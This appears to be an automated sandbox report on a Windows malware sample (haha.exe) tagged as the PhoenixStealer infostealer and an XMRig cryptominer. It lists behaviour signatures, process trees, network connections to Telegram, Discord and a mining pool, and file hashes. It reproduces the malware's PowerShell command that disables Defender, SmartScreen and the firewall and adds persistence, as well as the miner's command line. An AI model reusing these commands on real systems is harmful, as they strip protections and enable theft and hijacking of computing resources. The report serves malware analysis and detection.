Malware Analysis Report

2024-09-22 15:24

Sample ID 220707-jx1v7agabp
Target haha.exe
SHA256 9f2c2e2bcc9acf06fde3c0066db3befe4f89dad3cc66821c1633c5491eb10a5e
Tags
phoenixstealer xmrig evasion miner stealer suricata
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9f2c2e2bcc9acf06fde3c0066db3befe4f89dad3cc66821c1633c5491eb10a5e

Threat Level: Known bad

The file haha.exe was found to be: Known bad.

Malicious Activity Summary

phoenixstealer xmrig evasion miner stealer suricata

xmrig

PhoenixStealer

Suspicious use of NtCreateUserProcessOtherParentProcess

suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil

Modifies security service

XMRig Miner Payload

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

Drops startup file

Checks computer location settings

Loads dropped DLL

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2022-07-07 08:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-07-07 08:03

Reported

2022-07-07 08:14

Platform

win7-20220414-en

Max time kernel

501s

Max time network

558s

Command Line

"C:\Users\Admin\AppData\Local\Temp\haha.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

PhoenixStealer

stealer phoenixstealer

suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil

suricata

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1208 set thread context of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Windows\system32\NOTEPAD.EXE N/A
File created C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Program Files\7-Zip\7zG.exe N/A
File opened for modification C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Program Files\7-Zip\7zG.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\ProgramData\UpSys.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\ProgramData\UpSys.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90d0dd4fd891d801 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Systemd\procexp.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Systemd\procexp.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: 0 N/A C:\ProgramData\UpSys.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\Systemd\procexp.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2044 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 976 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 976 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 976 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 976 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 1560 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 1560 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 1560 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 1560 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 1560 wrote to memory of 20596 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\DllHost.exe
PID 1560 wrote to memory of 20596 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\DllHost.exe
PID 1560 wrote to memory of 20596 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\DllHost.exe
PID 1560 wrote to memory of 20596 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\DllHost.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 20596 wrote to memory of 213512 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 20596 wrote to memory of 213512 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 20596 wrote to memory of 213512 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 20596 wrote to memory of 213592 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\ProgramData\Systemd\procexp.exe
PID 20596 wrote to memory of 213592 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\ProgramData\Systemd\procexp.exe
PID 20596 wrote to memory of 213592 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\ProgramData\Systemd\procexp.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 213512 wrote to memory of 213972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe
PID 213512 wrote to memory of 213972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe
PID 213512 wrote to memory of 213972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe
PID 213512 wrote to memory of 214008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 213512 wrote to memory of 214008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 213512 wrote to memory of 214008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 213696 wrote to memory of 2040 N/A C:\ProgramData\UpSys.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 213696 wrote to memory of 2040 N/A C:\ProgramData\UpSys.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 213696 wrote to memory of 2040 N/A C:\ProgramData\UpSys.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\haha.exe

"C:\Users\Admin\AppData\Local\Temp\haha.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1

C:\Users\Admin\AppData\Local\Temp\79571.exe

"C:\Users\Admin\AppData\Local\Temp\79571.exe"

C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

"C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"

C:\Users\Admin\AppData\Local\Temp\DllHost.exe

"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)

C:\ProgramData\Systemd\procexp.exe

--url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4e8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CBS.log

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Windows\Logs\CBS\" -an -ai#7zMap20388:102:7zEvent1143

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
N/A 127.0.0.1:49173 tcp
N/A 127.0.0.1:49180 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 52.20.78.240:443 api.ipify.org tcp
US 52.20.78.240:443 api.ipify.org tcp
US 52.20.78.240:443 api.ipify.org tcp
US 52.20.78.240:443 api.ipify.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 142.132.131.248:80 pool.hashvault.pro tcp
RU 95.142.46.35:6666 tcp

Files

memory/2044-54-0x0000000075441000-0x0000000075443000-memory.dmp

memory/976-55-0x0000000000000000-mapping.dmp

memory/976-57-0x0000000073F90000-0x000000007453B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\79571.ps1

MD5 d831df909c8d68d7ac710f09ea9a7294
SHA1 4cf51399d9895c799c297e5e3078fa25cf4940b5
SHA256 9771d530fb3067031df355268df854d6f162d97074ae8883ffb30b7350cf8f0c
SHA512 000959c53063ee99db5ec20448a23e6406720c611ed225b7f8ed92855c1c576b2127cb48c6508cb61a00c9ab96fc40bed81a94e5db5ff18db520aacf48ac0e77

C:\Users\Admin\AppData\Local\Temp\79571.exe

MD5 cb9659a181ad8cc58023c5d8566b2d5a
SHA1 7b6c751aefca16847c2b1e57712342a7dffe585f
SHA256 d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2
SHA512 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

\Users\Admin\AppData\Local\Temp\79571.exe

MD5 cb9659a181ad8cc58023c5d8566b2d5a
SHA1 7b6c751aefca16847c2b1e57712342a7dffe585f
SHA256 d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2
SHA512 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

\Users\Admin\AppData\Local\Temp\79571.exe

MD5 cb9659a181ad8cc58023c5d8566b2d5a
SHA1 7b6c751aefca16847c2b1e57712342a7dffe585f
SHA256 d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2
SHA512 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

\Users\Admin\AppData\Local\Temp\79571.exe

MD5 cb9659a181ad8cc58023c5d8566b2d5a
SHA1 7b6c751aefca16847c2b1e57712342a7dffe585f
SHA256 d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2
SHA512 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

memory/1560-63-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\79571.exe

MD5 cb9659a181ad8cc58023c5d8566b2d5a
SHA1 7b6c751aefca16847c2b1e57712342a7dffe585f
SHA256 d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2
SHA512 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

memory/976-65-0x0000000073F90000-0x000000007453B000-memory.dmp

\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

MD5 77636b47fc9e1bc61a4a019371e09390
SHA1 615275ae7a28ee86cd9f4f586a3c7c5366490444
SHA256 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277
SHA512 ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

MD5 77636b47fc9e1bc61a4a019371e09390
SHA1 615275ae7a28ee86cd9f4f586a3c7c5366490444
SHA256 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277
SHA512 ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

memory/1208-68-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

MD5 77636b47fc9e1bc61a4a019371e09390
SHA1 615275ae7a28ee86cd9f4f586a3c7c5366490444
SHA256 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277
SHA512 ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

C:\Users\Admin\AppData\Local\Temp\DllHost.exe

MD5 6368031626da1f0d51bcac43104b123f
SHA1 5a340a1a3edc0bf03526e677a0415ffd156c139c
SHA256 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

memory/20596-71-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\DllHost.exe

MD5 6368031626da1f0d51bcac43104b123f
SHA1 5a340a1a3edc0bf03526e677a0415ffd156c139c
SHA256 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

\Users\Admin\AppData\Local\Temp\DllHost.exe

MD5 6368031626da1f0d51bcac43104b123f
SHA1 5a340a1a3edc0bf03526e677a0415ffd156c139c
SHA256 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

memory/20596-74-0x000007FEFBB11000-0x000007FEFBB13000-memory.dmp

memory/213440-75-0x0000000000400000-0x000000000048E000-memory.dmp

memory/213440-77-0x0000000000400000-0x000000000048E000-memory.dmp

memory/1208-79-0x0000000000400000-0x00000000005C5000-memory.dmp

memory/213512-80-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\DllHost.exe

MD5 6368031626da1f0d51bcac43104b123f
SHA1 5a340a1a3edc0bf03526e677a0415ffd156c139c
SHA256 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

\ProgramData\MicrosoftNetwork\System.exe

MD5 6368031626da1f0d51bcac43104b123f
SHA1 5a340a1a3edc0bf03526e677a0415ffd156c139c
SHA256 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
